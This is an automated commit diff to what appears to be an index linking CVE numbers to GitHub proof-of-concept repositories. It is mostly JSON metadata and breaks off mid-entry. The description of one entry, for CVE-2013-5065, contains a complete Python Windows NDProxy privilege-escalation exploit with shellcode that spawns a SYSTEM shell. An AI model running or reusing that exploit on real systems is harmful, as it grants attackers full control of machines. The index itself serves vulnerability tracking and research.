Auto Update 2020/08/10 06:08:22

This commit is contained in:
motikan2010-bot 2020-08-10 06:08:22 +09:00
parent 2bd6d3c8c9
commit 6d09ba9ad8
46 changed files with 746 additions and 1104 deletions

View file

@ -1,4 +1,50 @@
[ [
{
"id": 13021222,
"name": "debian-ssh",
"full_name": "g0tmi1k\/debian-ssh",
"owner": {
"login": "g0tmi1k",
"id": 535942,
"avatar_url": "https:\/\/avatars3.githubusercontent.com\/u\/535942?v=4",
"html_url": "https:\/\/github.com\/g0tmi1k"
},
"html_url": "https:\/\/github.com\/g0tmi1k\/debian-ssh",
"description": "Debian OpenSSL Predictable PRNG (CVE-2008-0166)",
"fork": false,
"created_at": "2013-09-22T21:20:31Z",
"updated_at": "2020-08-04T14:00:34Z",
"pushed_at": "2017-04-24T14:16:56Z",
"stargazers_count": 266,
"watchers_count": 266,
"forks_count": 85,
"forks": 85,
"watchers": 266,
"score": 0
},
{
"id": 163681865,
"name": "vulnkeys",
"full_name": "avarx\/vulnkeys",
"owner": {
"login": "avarx",
"id": 1161946,
"avatar_url": "https:\/\/avatars0.githubusercontent.com\/u\/1161946?v=4",
"html_url": "https:\/\/github.com\/avarx"
},
"html_url": "https:\/\/github.com\/avarx\/vulnkeys",
"description": "Debian OpenSSL Predictable PRNG (CVE-2008-0166)",
"fork": false,
"created_at": "2018-12-31T16:09:49Z",
"updated_at": "2018-12-31T16:11:19Z",
"pushed_at": "2018-12-31T16:11:18Z",
"stargazers_count": 0,
"watchers_count": 0,
"forks_count": 0,
"forks": 0,
"watchers": 0,
"score": 0
},
{ {
"id": 173164801, "id": 173164801,
"name": "debian-ssh", "name": "debian-ssh",

25
2008/CVE-2008-0228.json Normal file
View file

@ -0,0 +1,25 @@
[
{
"id": 2121080,
"name": "TWSL2011-007_iOS_code_workaround",
"full_name": "SpiderLabs\/TWSL2011-007_iOS_code_workaround",
"owner": {
"login": "SpiderLabs",
"id": 508521,
"avatar_url": "https:\/\/avatars2.githubusercontent.com\/u\/508521?v=4",
"html_url": "https:\/\/github.com\/SpiderLabs"
},
"html_url": "https:\/\/github.com\/SpiderLabs\/TWSL2011-007_iOS_code_workaround",
"description": "Workaround for the vulnerability identified by TWSL2011-007 or CVE-2008-0228 - iOS x509 Certificate Chain Validation Vulnerability",
"fork": false,
"created_at": "2011-07-28T22:20:41Z",
"updated_at": "2020-04-15T06:05:25Z",
"pushed_at": "2011-07-28T22:46:34Z",
"stargazers_count": 6,
"watchers_count": 6,
"forks_count": 2,
"forks": 2,
"watchers": 6,
"score": 0
}
]

25
2008/CVE-2008-1611.json Normal file
View file

@ -0,0 +1,25 @@
[
{
"id": 226703669,
"name": "CVE-2008-1611",
"full_name": "Axua\/CVE-2008-1611",
"owner": {
"login": "Axua",
"id": 28788087,
"avatar_url": "https:\/\/avatars3.githubusercontent.com\/u\/28788087?v=4",
"html_url": "https:\/\/github.com\/Axua"
},
"html_url": "https:\/\/github.com\/Axua\/CVE-2008-1611",
"description": "CVE-2008-1611 TFTP 1.41 buffer overflow exploit in the filepath",
"fork": false,
"created_at": "2019-12-08T17:18:31Z",
"updated_at": "2019-12-09T09:54:11Z",
"pushed_at": "2019-12-08T17:18:59Z",
"stargazers_count": 1,
"watchers_count": 1,
"forks_count": 0,
"forks": 0,
"watchers": 1,
"score": 0
}
]

25
2008/CVE-2008-1613.json Normal file
View file

@ -0,0 +1,25 @@
[
{
"id": 90186634,
"name": "CVE-2008-1613",
"full_name": "SECFORCE\/CVE-2008-1613",
"owner": {
"login": "SECFORCE",
"id": 8157384,
"avatar_url": "https:\/\/avatars2.githubusercontent.com\/u\/8157384?v=4",
"html_url": "https:\/\/github.com\/SECFORCE"
},
"html_url": "https:\/\/github.com\/SECFORCE\/CVE-2008-1613",
"description": "RedDot CMS versions 7.5 Build 7.5.0.48 and below full database enumeration exploit that takes advantage of a remote SQL injection vulnerability in ioRD.asp.",
"fork": false,
"created_at": "2017-05-03T19:39:27Z",
"updated_at": "2020-05-18T10:42:05Z",
"pushed_at": "2017-05-03T19:40:32Z",
"stargazers_count": 3,
"watchers_count": 3,
"forks_count": 9,
"forks": 9,
"watchers": 3,
"score": 0
}
]

25
2008/CVE-2008-2019.json Normal file
View file

@ -0,0 +1,25 @@
[
{
"id": 276735337,
"name": "AudioCaptchaBypass-CVE-2008-2019",
"full_name": "TheRook\/AudioCaptchaBypass-CVE-2008-2019",
"owner": {
"login": "TheRook",
"id": 521783,
"avatar_url": "https:\/\/avatars0.githubusercontent.com\/u\/521783?v=4",
"html_url": "https:\/\/github.com\/TheRook"
},
"html_url": "https:\/\/github.com\/TheRook\/AudioCaptchaBypass-CVE-2008-2019",
"description": null,
"fork": false,
"created_at": "2020-07-02T20:04:05Z",
"updated_at": "2020-07-02T21:27:53Z",
"pushed_at": "2020-07-02T21:27:50Z",
"stargazers_count": 0,
"watchers_count": 0,
"forks_count": 0,
"forks": 0,
"watchers": 0,
"score": 0
}
]

25
2008/CVE-2008-4609.json Normal file
View file

@ -0,0 +1,25 @@
[
{
"id": 58223324,
"name": "sockstress",
"full_name": "marcelki\/sockstress",
"owner": {
"login": "marcelki",
"id": 8465322,
"avatar_url": "https:\/\/avatars0.githubusercontent.com\/u\/8465322?v=4",
"html_url": "https:\/\/github.com\/marcelki"
},
"html_url": "https:\/\/github.com\/marcelki\/sockstress",
"description": "Sockstress (CVE-2008-4609) DDoS implementation written in Go",
"fork": false,
"created_at": "2016-05-06T17:21:32Z",
"updated_at": "2020-06-04T09:57:06Z",
"pushed_at": "2016-07-02T18:52:16Z",
"stargazers_count": 12,
"watchers_count": 12,
"forks_count": 4,
"forks": 4,
"watchers": 12,
"score": 0
}
]

View file

@ -21,5 +21,28 @@
"forks": 0, "forks": 0,
"watchers": 0, "watchers": 0,
"score": 0 "score": 0
},
{
"id": 100675675,
"name": "VLC-CVE-2008-4654-Exploit",
"full_name": "KernelErr\/VLC-CVE-2008-4654-Exploit",
"owner": {
"login": "KernelErr",
"id": 45716019,
"avatar_url": "https:\/\/avatars0.githubusercontent.com\/u\/45716019?v=4",
"html_url": "https:\/\/github.com\/KernelErr"
},
"html_url": "https:\/\/github.com\/KernelErr\/VLC-CVE-2008-4654-Exploit",
"description": "An EXP could run on Windows x64 against CVE-2008-4654.",
"fork": false,
"created_at": "2017-08-18T05:22:29Z",
"updated_at": "2019-11-04T11:30:37Z",
"pushed_at": "2017-08-18T05:57:09Z",
"stargazers_count": 2,
"watchers_count": 2,
"forks_count": 0,
"forks": 0,
"watchers": 2,
"score": 0
} }
] ]

25
2008/CVE-2008-4687.json Normal file
View file

@ -0,0 +1,25 @@
[
{
"id": 268011635,
"name": "CVE-2008-4687-exploit",
"full_name": "nmurilo\/CVE-2008-4687-exploit",
"owner": {
"login": "nmurilo",
"id": 22617810,
"avatar_url": "https:\/\/avatars1.githubusercontent.com\/u\/22617810?v=4",
"html_url": "https:\/\/github.com\/nmurilo"
},
"html_url": "https:\/\/github.com\/nmurilo\/CVE-2008-4687-exploit",
"description": null,
"fork": false,
"created_at": "2020-05-30T04:53:07Z",
"updated_at": "2020-05-30T05:14:42Z",
"pushed_at": "2020-05-30T05:14:40Z",
"stargazers_count": 0,
"watchers_count": 0,
"forks_count": 0,
"forks": 0,
"watchers": 0,
"score": 0
}
]

View file

@ -1,27 +1,4 @@
[ [
{
"id": 114424141,
"name": "privesc-CVE-2010-0426",
"full_name": "t0kx\/privesc-CVE-2010-0426",
"owner": {
"login": "t0kx",
"id": 24924517,
"avatar_url": "https:\/\/avatars1.githubusercontent.com\/u\/24924517?v=4",
"html_url": "https:\/\/github.com\/t0kx"
},
"html_url": "https:\/\/github.com\/t0kx\/privesc-CVE-2010-0426",
"description": "Sudo 1.6.x <= 1.6.9p21 and 1.7.x <= 1.7.2p4 Local Privilege Escalation and vulnerable container",
"fork": false,
"created_at": "2017-12-16T01:16:44Z",
"updated_at": "2020-04-20T12:29:23Z",
"pushed_at": "2017-12-16T01:19:11Z",
"stargazers_count": 5,
"watchers_count": 5,
"forks_count": 6,
"forks": 6,
"watchers": 5,
"score": 0
},
{ {
"id": 164330369, "id": 164330369,
"name": "cve-2010-0426", "name": "cve-2010-0426",

View file

@ -1,27 +1,4 @@
[ [
{
"id": 29914821,
"name": "jboss-autopwn",
"full_name": "ChristianPapathanasiou\/jboss-autopwn",
"owner": {
"login": "ChristianPapathanasiou",
"id": 5354349,
"avatar_url": "https:\/\/avatars1.githubusercontent.com\/u\/5354349?v=4",
"html_url": "https:\/\/github.com\/ChristianPapathanasiou"
},
"html_url": "https:\/\/github.com\/ChristianPapathanasiou\/jboss-autopwn",
"description": "JBoss Autopwn as featured at BlackHat Europe 2010 - this version incorporates CVE-2010-0738 the JBoss authentication bypass VERB manipulation vulnerability as discovered by Minded Security",
"fork": false,
"created_at": "2015-01-27T13:16:45Z",
"updated_at": "2020-07-02T11:52:16Z",
"pushed_at": "2015-01-27T13:23:18Z",
"stargazers_count": 13,
"watchers_count": 13,
"forks_count": 7,
"forks": 7,
"watchers": 13,
"score": 0
},
{ {
"id": 62456741, "id": 62456741,
"name": "jboss-autopwn", "name": "jboss-autopwn",

View file

@ -1,25 +0,0 @@
[
{
"id": 911174,
"name": "CVE-2010-1205",
"full_name": "mk219533\/CVE-2010-1205",
"owner": {
"login": "mk219533",
"id": 91629,
"avatar_url": "https:\/\/avatars3.githubusercontent.com\/u\/91629?v=4",
"html_url": "https:\/\/github.com\/mk219533"
},
"html_url": "https:\/\/github.com\/mk219533\/CVE-2010-1205",
"description": "sample exploit of buffer overflow in libpng ",
"fork": false,
"created_at": "2010-09-14T22:16:11Z",
"updated_at": "2020-05-07T01:35:39Z",
"pushed_at": "2010-10-03T14:06:12Z",
"stargazers_count": 4,
"watchers_count": 4,
"forks_count": 0,
"forks": 0,
"watchers": 4,
"score": 0
}
]

View file

@ -1,25 +0,0 @@
[
{
"id": 282739625,
"name": "CVE-2010-15606",
"full_name": "Babs84\/CVE-2010-15606",
"owner": {
"login": "Babs84",
"id": 18121247,
"avatar_url": "https:\/\/avatars3.githubusercontent.com\/u\/18121247?v=4",
"html_url": "https:\/\/github.com\/Babs84"
},
"html_url": "https:\/\/github.com\/Babs84\/CVE-2010-15606",
"description": null,
"fork": false,
"created_at": "2020-07-26T21:54:27Z",
"updated_at": "2020-07-26T21:54:27Z",
"pushed_at": "2020-07-26T21:54:28Z",
"stargazers_count": 0,
"watchers_count": 0,
"forks_count": 0,
"forks": 0,
"watchers": 0,
"score": 0
}
]

View file

@ -1,25 +0,0 @@
[
{
"id": 106621452,
"name": "MS10-070",
"full_name": "bongbongco\/MS10-070",
"owner": {
"login": "bongbongco",
"id": 3170006,
"avatar_url": "https:\/\/avatars1.githubusercontent.com\/u\/3170006?v=4",
"html_url": "https:\/\/github.com\/bongbongco"
},
"html_url": "https:\/\/github.com\/bongbongco\/MS10-070",
"description": "CVE-2010-3332 Oracle Padding Vulnerability in Microsoft ASP.NET",
"fork": false,
"created_at": "2017-10-11T23:50:33Z",
"updated_at": "2020-07-17T05:12:24Z",
"pushed_at": "2017-10-11T23:50:58Z",
"stargazers_count": 0,
"watchers_count": 0,
"forks_count": 1,
"forks": 1,
"watchers": 0,
"score": 0
}
]

View file

@ -1,25 +0,0 @@
[
{
"id": 222810581,
"name": "CVE-2010-3437",
"full_name": "huang-emily\/CVE-2010-3437",
"owner": {
"login": "huang-emily",
"id": 25013982,
"avatar_url": "https:\/\/avatars3.githubusercontent.com\/u\/25013982?v=4",
"html_url": "https:\/\/github.com\/huang-emily"
},
"html_url": "https:\/\/github.com\/huang-emily\/CVE-2010-3437",
"description": null,
"fork": false,
"created_at": "2019-11-19T23:35:57Z",
"updated_at": "2019-11-19T23:36:01Z",
"pushed_at": "2019-11-19T23:35:59Z",
"stargazers_count": 0,
"watchers_count": 0,
"forks_count": 0,
"forks": 0,
"watchers": 0,
"score": 0
}
]

View file

@ -1,25 +0,0 @@
[
{
"id": 226908489,
"name": "CVE-2010-3490",
"full_name": "moayadalmalat\/CVE-2010-3490",
"owner": {
"login": "moayadalmalat",
"id": 42471675,
"avatar_url": "https:\/\/avatars1.githubusercontent.com\/u\/42471675?v=4",
"html_url": "https:\/\/github.com\/moayadalmalat"
},
"html_url": "https:\/\/github.com\/moayadalmalat\/CVE-2010-3490",
"description": "FreePBX exploit <= 2.8.0",
"fork": false,
"created_at": "2019-12-09T15:49:21Z",
"updated_at": "2019-12-09T15:57:52Z",
"pushed_at": "2019-12-09T15:57:50Z",
"stargazers_count": 0,
"watchers_count": 0,
"forks_count": 0,
"forks": 0,
"watchers": 0,
"score": 0
}
]

View file

@ -1,25 +0,0 @@
[
{
"id": 108682441,
"name": "cve-2010-4221",
"full_name": "M31MOTH\/cve-2010-4221",
"owner": {
"login": "M31MOTH",
"id": 10201432,
"avatar_url": "https:\/\/avatars1.githubusercontent.com\/u\/10201432?v=4",
"html_url": "https:\/\/github.com\/M31MOTH"
},
"html_url": "https:\/\/github.com\/M31MOTH\/cve-2010-4221",
"description": "This exploit was written to study some concepts, enjoy!",
"fork": false,
"created_at": "2017-10-28T20:37:26Z",
"updated_at": "2020-03-26T15:45:57Z",
"pushed_at": "2017-10-22T19:46:37Z",
"stargazers_count": 1,
"watchers_count": 1,
"forks_count": 11,
"forks": 11,
"watchers": 1,
"score": 0
}
]

View file

@ -1,25 +0,0 @@
[
{
"id": 30897048,
"name": "CVE-2010-4258",
"full_name": "johnreginald\/CVE-2010-4258",
"owner": {
"login": "johnreginald",
"id": 8102802,
"avatar_url": "https:\/\/avatars2.githubusercontent.com\/u\/8102802?v=4",
"html_url": "https:\/\/github.com\/johnreginald"
},
"html_url": "https:\/\/github.com\/johnreginald\/CVE-2010-4258",
"description": "Exploit based on a faulty clone(2) implementation in Linux < 2.6.36.2 that allows overwrite of arbitrary kernel word with NULL. Research and personal-security use only. Not malicious.",
"fork": false,
"created_at": "2015-02-17T01:12:55Z",
"updated_at": "2016-09-04T16:50:03Z",
"pushed_at": "2012-07-12T18:58:48Z",
"stargazers_count": 0,
"watchers_count": 0,
"forks_count": 0,
"forks": 0,
"watchers": 0,
"score": 0
}
]

25
2013/CVE-2013-1300.json Normal file
View file

@ -0,0 +1,25 @@
[
{
"id": 12703345,
"name": "cve-2013-1300",
"full_name": "Meatballs1\/cve-2013-1300",
"owner": {
"login": "Meatballs1",
"id": 1854557,
"avatar_url": "https:\/\/avatars2.githubusercontent.com\/u\/1854557?v=4",
"html_url": "https:\/\/github.com\/Meatballs1"
},
"html_url": "https:\/\/github.com\/Meatballs1\/cve-2013-1300",
"description": null,
"fork": false,
"created_at": "2013-09-09T14:20:57Z",
"updated_at": "2019-01-04T20:51:23Z",
"pushed_at": "2014-01-29T09:05:27Z",
"stargazers_count": 8,
"watchers_count": 8,
"forks_count": 11,
"forks": 11,
"watchers": 8,
"score": 0
}
]

25
2013/CVE-2013-1690.json Normal file
View file

@ -0,0 +1,25 @@
[
{
"id": 23095226,
"name": "annotated-fbi-tbb-exploit",
"full_name": "vlad902\/annotated-fbi-tbb-exploit",
"owner": {
"login": "vlad902",
"id": 1088893,
"avatar_url": "https:\/\/avatars1.githubusercontent.com\/u\/1088893?v=4",
"html_url": "https:\/\/github.com\/vlad902"
},
"html_url": "https:\/\/github.com\/vlad902\/annotated-fbi-tbb-exploit",
"description": "Annotated FBI exploit for the Tor Browser Bundle from mid-2013 (CVE-2013-1690)",
"fork": false,
"created_at": "2014-08-19T03:16:49Z",
"updated_at": "2020-04-07T07:59:10Z",
"pushed_at": "2014-08-19T03:22:29Z",
"stargazers_count": 13,
"watchers_count": 13,
"forks_count": 6,
"forks": 6,
"watchers": 13,
"score": 0
}
]

25
2013/CVE-2013-2072.json Normal file
View file

@ -0,0 +1,25 @@
[
{
"id": 18517406,
"name": "cve-2013-2072",
"full_name": "bl4ck5un\/cve-2013-2072",
"owner": {
"login": "bl4ck5un",
"id": 2434648,
"avatar_url": "https:\/\/avatars2.githubusercontent.com\/u\/2434648?v=4",
"html_url": "https:\/\/github.com\/bl4ck5un"
},
"html_url": "https:\/\/github.com\/bl4ck5un\/cve-2013-2072",
"description": "Buffer overflow in the Python bindings for the xc_vcpu_setaffinity call in Xen",
"fork": false,
"created_at": "2014-04-07T13:14:04Z",
"updated_at": "2014-07-13T00:53:10Z",
"pushed_at": "2014-04-07T14:30:22Z",
"stargazers_count": 0,
"watchers_count": 0,
"forks_count": 0,
"forks": 0,
"watchers": 0,
"score": 0
}
]

25
2013/CVE-2013-2597.json Normal file
View file

@ -0,0 +1,25 @@
[
{
"id": 10615119,
"name": "libmsm_acdb_exploit",
"full_name": "fi01\/libmsm_acdb_exploit",
"owner": {
"login": "fi01",
"id": 3073214,
"avatar_url": "https:\/\/avatars0.githubusercontent.com\/u\/3073214?v=4",
"html_url": "https:\/\/github.com\/fi01"
},
"html_url": "https:\/\/github.com\/fi01\/libmsm_acdb_exploit",
"description": "CVE-2013-2597 exploit",
"fork": false,
"created_at": "2013-06-11T05:07:05Z",
"updated_at": "2018-12-20T17:02:39Z",
"pushed_at": "2014-06-05T08:34:17Z",
"stargazers_count": 11,
"watchers_count": 11,
"forks_count": 9,
"forks": 9,
"watchers": 11,
"score": 0
}
]

25
2013/CVE-2013-2730.json Normal file
View file

@ -0,0 +1,25 @@
[
{
"id": 10088128,
"name": "CVE-2013-2730",
"full_name": "feliam\/CVE-2013-2730",
"owner": {
"login": "feliam",
"id": 1017522,
"avatar_url": "https:\/\/avatars1.githubusercontent.com\/u\/1017522?v=4",
"html_url": "https:\/\/github.com\/feliam"
},
"html_url": "https:\/\/github.com\/feliam\/CVE-2013-2730",
"description": null,
"fork": false,
"created_at": "2013-05-15T21:15:12Z",
"updated_at": "2020-04-23T18:50:20Z",
"pushed_at": "2013-05-15T21:36:13Z",
"stargazers_count": 10,
"watchers_count": 10,
"forks_count": 8,
"forks": 8,
"watchers": 10,
"score": 0
}
]

25
2013/CVE-2013-4348.json Normal file
View file

@ -0,0 +1,25 @@
[
{
"id": 18517249,
"name": "cve-2013-4348",
"full_name": "bl4ck5un\/cve-2013-4348",
"owner": {
"login": "bl4ck5un",
"id": 2434648,
"avatar_url": "https:\/\/avatars2.githubusercontent.com\/u\/2434648?v=4",
"html_url": "https:\/\/github.com\/bl4ck5un"
},
"html_url": "https:\/\/github.com\/bl4ck5un\/cve-2013-4348",
"description": "DOS (infinite loop) attack via a small value in the IHL field of a packet with IPIP encapsulation",
"fork": false,
"created_at": "2014-04-07T13:08:34Z",
"updated_at": "2016-09-22T09:01:33Z",
"pushed_at": "2014-04-07T14:39:04Z",
"stargazers_count": 0,
"watchers_count": 0,
"forks_count": 0,
"forks": 0,
"watchers": 0,
"score": 0
}
]

25
2013/CVE-2013-5065.json Normal file
View file

@ -0,0 +1,25 @@
[
{
"id": 15000564,
"name": "RobbinHood",
"full_name": "Friarfukd\/RobbinHood",
"owner": {
"login": "Friarfukd",
"id": 6127925,
"avatar_url": "https:\/\/avatars1.githubusercontent.com\/u\/6127925?v=4",
"html_url": "https:\/\/github.com\/Friarfukd"
},
"html_url": "https:\/\/github.com\/Friarfukd\/RobbinHood",
"description": "# NDPROXY Local SYSTEM privilege escalation # http:\/\/www.offensive-security.com # Tested on Windows XP SP3 # http:\/\/www.offensive-security.com\/vulndev\/ndproxy-local-system-exploit-cve-2013-5065\/     # Original crash ... null pointer dereference # Access violation - code c0000005 (!!! second chance !!!) # 00000038 ??              ???   from ctypes import * from ctypes.wintypes import * import os, sys   kernel32 = windll.kernel32 ntdll = windll.ntdll   GENERIC_READ     = 0x80000000 GENERIC_WRITE    = 0x40000000 FILE_SHARE_READ  = 0x00000001 FILE_SHARE_WRITE = 0x00000002 NULL = 0x0 OPEN_EXISTING = 0x3 PROCESS_VM_WRITE            = 0x0020 PROCESS_VM_READ             = 0x0010 MEM_COMMIT                  = 0x00001000 MEM_RESERVE                 = 0x00002000 MEM_FREE                    = 0x00010000 PAGE_EXECUTE_READWRITE      = 0x00000040 PROCESS_ALL_ACCESS          = 2097151 FORMAT_MESSAGE_FROM_SYSTEM  = 0x00001000 baseadd = c_int(0x00000001) MEMRES = (0x1000 | 0x2000) MEM_DECOMMIT = 0x4000 PAGEEXE = 0x00000040 null_size = c_int(0x1000) STATUS_SUCCESS = 0   def log(msg):     print msg   def getLastError():     \"\"\"[-] Format GetLastError\"\"\"     buf = create_string_buffer(2048)     if kernel32.FormatMessageA(FORMAT_MESSAGE_FROM_SYSTEM, NULL,             kernel32.GetLastError(), 0,             buf, sizeof(buf), NULL):         log(buf.value)     else:         log(\"[-] Unknown Error\")   print \"[*] Microsoft Windows NDProxy CVE-2013-5065 0day\" print \"[*] Vulnerability found in the wild\" print \"[*] Coded by Offensive Security\"                 tmp = (\"\\x00\"*4)*5 + \"\\x25\\x01\\x03\\x07\" + \"\\x00\"*4 + \"\\x34\\x00\\x00\\x00\" + \"\\x00\"*(84-24) InBuf = c_char_p(tmp)   dwStatus = ntdll.NtAllocateVirtualMemory(0xFFFFFFFF, byref(baseadd), 0x0, byref(null_size), MEMRES, PAGEEXE) if dwStatus != STATUS_SUCCESS:     print \"[+] Something went wrong while allocating the null paged memory: %s\" % dwStatus     getLastError() written = c_ulong() sh = \"\\x90\\x33\\xC0\\x64\\x8B\\x80\\x24\\x01\\x00\\x00\\x8B\\x40\\x44\\x8B\\xC8\\x8B\\x80\\x88\\x00\\x00\\x00\\x2D\\x88\\x00\\x00\\x00\\x83\\xB8\\x84\\x00\\x00\\x00\\x04\\x75\\xEC\\x8B\\x90\\xC8\\x00\\x00\\x00\\x89\\x91\\xC8\\x00\\x00\\x00\\xC3\" sc = \"\\x90\"*0x38 + \"\\x3c\\x00\\x00\\x00\" + \"\\x90\"*4 + sh + \"\\xcc\"*(0x400-0x3c-4-len(sh)) alloc = kernel32.WriteProcessMemory(0xFFFFFFFF, 0x00000001, sc, 0x400, byref(written)) if alloc == 0:     print \"[+] Something went wrong while writing our junk to the null paged memory: %s\" % alloc     getLastError()   dwRetBytes = DWORD(0) DEVICE_NAME   = \"\\\\\\\\.\\\\NDProxy\" hdev = kernel32.CreateFileA(DEVICE_NAME, 0, 0, None, OPEN_EXISTING , 0, None) if hdev == -1:     print \"[-] Couldn't open the device... :(\"     sys.exit() kernel32.DeviceIoControl(hdev, 0x8fff23cc, InBuf, 0x54, InBuf, 0x24, byref(dwRetBytes), 0) kernel32.CloseHandle(hdev) print \"[+] Spawning SYSTEM Shell...\" os.system(\"start \/d \\\"C:\\\\windows\\\\system32\\\" cmd.exe\")",
"fork": false,
"created_at": "2013-12-07T05:37:28Z",
"updated_at": "2016-09-04T16:47:18Z",
"pushed_at": "2013-12-07T05:37:28Z",
"stargazers_count": 0,
"watchers_count": 0,
"forks_count": 1,
"forks": 1,
"watchers": 0,
"score": 0
}
]

View file

@ -1,4 +1,50 @@
[ [
{
"id": 23763984,
"name": "ntpscanner",
"full_name": "dani87\/ntpscanner",
"owner": {
"login": "dani87",
"id": 4827873,
"avatar_url": "https:\/\/avatars1.githubusercontent.com\/u\/4827873?v=4",
"html_url": "https:\/\/github.com\/dani87"
},
"html_url": "https:\/\/github.com\/dani87\/ntpscanner",
"description": "Scans NTP servers for CVE-2013-5211 NTP DDOS amplification vulnerability.",
"fork": false,
"created_at": "2014-09-07T16:02:25Z",
"updated_at": "2019-12-05T04:58:29Z",
"pushed_at": "2014-09-07T18:41:42Z",
"stargazers_count": 11,
"watchers_count": 11,
"forks_count": 6,
"forks": 6,
"watchers": 11,
"score": 0
},
{
"id": 28004357,
"name": "ntpscanner",
"full_name": "suedadam\/ntpscanner",
"owner": {
"login": "suedadam",
"id": 3879307,
"avatar_url": "https:\/\/avatars1.githubusercontent.com\/u\/3879307?v=4",
"html_url": "https:\/\/github.com\/suedadam"
},
"html_url": "https:\/\/github.com\/suedadam\/ntpscanner",
"description": "NTP monlist scanner CVE-2013-5211",
"fork": false,
"created_at": "2014-12-14T18:58:26Z",
"updated_at": "2018-06-07T13:35:38Z",
"pushed_at": "2014-12-14T19:04:40Z",
"stargazers_count": 1,
"watchers_count": 1,
"forks_count": 1,
"forks": 1,
"watchers": 1,
"score": 0
},
{ {
"id": 210687653, "id": 210687653,
"name": "ntpdos", "name": "ntpdos",

View file

@ -1,4 +1,73 @@
[ [
{
"id": 14481346,
"name": "libput_user_exploit",
"full_name": "fi01\/libput_user_exploit",
"owner": {
"login": "fi01",
"id": 3073214,
"avatar_url": "https:\/\/avatars0.githubusercontent.com\/u\/3073214?v=4",
"html_url": "https:\/\/github.com\/fi01"
},
"html_url": "https:\/\/github.com\/fi01\/libput_user_exploit",
"description": "CVE-2013-6282 exploit",
"fork": false,
"created_at": "2013-11-18T03:08:41Z",
"updated_at": "2019-10-20T07:13:13Z",
"pushed_at": "2013-11-18T08:56:33Z",
"stargazers_count": 25,
"watchers_count": 25,
"forks_count": 12,
"forks": 12,
"watchers": 25,
"score": 0
},
{
"id": 14771627,
"name": "libget_user_exploit",
"full_name": "fi01\/libget_user_exploit",
"owner": {
"login": "fi01",
"id": 3073214,
"avatar_url": "https:\/\/avatars0.githubusercontent.com\/u\/3073214?v=4",
"html_url": "https:\/\/github.com\/fi01"
},
"html_url": "https:\/\/github.com\/fi01\/libget_user_exploit",
"description": "CVE-2013-6282 exploit",
"fork": false,
"created_at": "2013-11-28T08:34:35Z",
"updated_at": "2017-08-06T23:25:14Z",
"pushed_at": "2013-11-28T08:38:53Z",
"stargazers_count": 7,
"watchers_count": 7,
"forks_count": 2,
"forks": 2,
"watchers": 7,
"score": 0
},
{
"id": 15352293,
"name": "bypasslkm",
"full_name": "jeboo\/bypasslkm",
"owner": {
"login": "jeboo",
"id": 1755205,
"avatar_url": "https:\/\/avatars0.githubusercontent.com\/u\/1755205?v=4",
"html_url": "https:\/\/github.com\/jeboo"
},
"html_url": "https:\/\/github.com\/jeboo\/bypasslkm",
"description": "Using CVE-2013-6282 to bypass Samsung kernel module authentication",
"fork": false,
"created_at": "2013-12-21T01:51:42Z",
"updated_at": "2020-04-05T16:16:38Z",
"pushed_at": "2013-12-21T01:53:31Z",
"stargazers_count": 10,
"watchers_count": 10,
"forks_count": 3,
"forks": 3,
"watchers": 10,
"score": 0
},
{ {
"id": 76877120, "id": 76877120,
"name": "CVE-2013-6282", "name": "CVE-2013-6282",

25
2013/CVE-2013-6375.json Normal file
View file

@ -0,0 +1,25 @@
[
{
"id": 18543095,
"name": "cve-2013-6375",
"full_name": "bl4ck5un\/cve-2013-6375",
"owner": {
"login": "bl4ck5un",
"id": 2434648,
"avatar_url": "https:\/\/avatars2.githubusercontent.com\/u\/2434648?v=4",
"html_url": "https:\/\/github.com\/bl4ck5un"
},
"html_url": "https:\/\/github.com\/bl4ck5un\/cve-2013-6375",
"description": "Xen 4.2.x and 4.3.x, when using Intel VT-d for PCI passthrough, does not properly flush the TLB after clearing a present translation table entry, which allows local guest administrators to cause a denial of service or gain privileges via unspecified vectors related to an \"inverted boolean parameter.\"",
"fork": false,
"created_at": "2014-04-08T02:59:22Z",
"updated_at": "2014-07-13T00:53:10Z",
"pushed_at": "2014-04-08T02:59:22Z",
"stargazers_count": 0,
"watchers_count": 0,
"forks_count": 0,
"forks": 0,
"watchers": 0,
"score": 0
}
]

25
2013/CVE-2013-6668.json Normal file
View file

@ -0,0 +1,25 @@
[
{
"id": 23866703,
"name": "CveTest",
"full_name": "sdneon\/CveTest",
"owner": {
"login": "sdneon",
"id": 8720479,
"avatar_url": "https:\/\/avatars3.githubusercontent.com\/u\/8720479?v=4",
"html_url": "https:\/\/github.com\/sdneon"
},
"html_url": "https:\/\/github.com\/sdneon\/CveTest",
"description": "Test case for Node.JS V0.10.31 v8 backport CVE-2013-6668 crash",
"fork": false,
"created_at": "2014-09-10T08:27:05Z",
"updated_at": "2016-09-04T16:47:36Z",
"pushed_at": "2014-09-11T05:22:57Z",
"stargazers_count": 0,
"watchers_count": 0,
"forks_count": 0,
"forks": 0,
"watchers": 0,
"score": 0
}
]

View file

@ -1,25 +0,0 @@
[
{
"id": 85834314,
"name": "CVE-2017-0038-EXP-C-JS",
"full_name": "k0keoyo\/CVE-2017-0038-EXP-C-JS",
"owner": {
"login": "k0keoyo",
"id": 13257929,
"avatar_url": "https:\/\/avatars0.githubusercontent.com\/u\/13257929?v=4",
"html_url": "https:\/\/github.com\/k0keoyo"
},
"html_url": "https:\/\/github.com\/k0keoyo\/CVE-2017-0038-EXP-C-JS",
"description": null,
"fork": false,
"created_at": "2017-03-22T13:59:48Z",
"updated_at": "2019-09-13T11:40:59Z",
"pushed_at": "2017-03-23T14:07:37Z",
"stargazers_count": 6,
"watchers_count": 6,
"forks_count": 8,
"forks": 8,
"watchers": 6,
"score": 0
}
]

View file

@ -1,25 +0,0 @@
[
{
"id": 85072866,
"name": "cve-2017-0065",
"full_name": "Dankirk\/cve-2017-0065",
"owner": {
"login": "Dankirk",
"id": 10588760,
"avatar_url": "https:\/\/avatars1.githubusercontent.com\/u\/10588760?v=4",
"html_url": "https:\/\/github.com\/Dankirk"
},
"html_url": "https:\/\/github.com\/Dankirk\/cve-2017-0065",
"description": "Exploiting Edge's read:\/\/ urlhandler",
"fork": false,
"created_at": "2017-03-15T13:01:29Z",
"updated_at": "2019-10-26T13:38:33Z",
"pushed_at": "2017-03-15T13:47:22Z",
"stargazers_count": 15,
"watchers_count": 15,
"forks_count": 14,
"forks": 14,
"watchers": 15,
"score": 0
}
]

View file

@ -1,27 +1,4 @@
[ [
{
"id": 85445247,
"name": "CVE-2017-0478",
"full_name": "JiounDai\/CVE-2017-0478",
"owner": {
"login": "JiounDai",
"id": 4220640,
"avatar_url": "https:\/\/avatars2.githubusercontent.com\/u\/4220640?v=4",
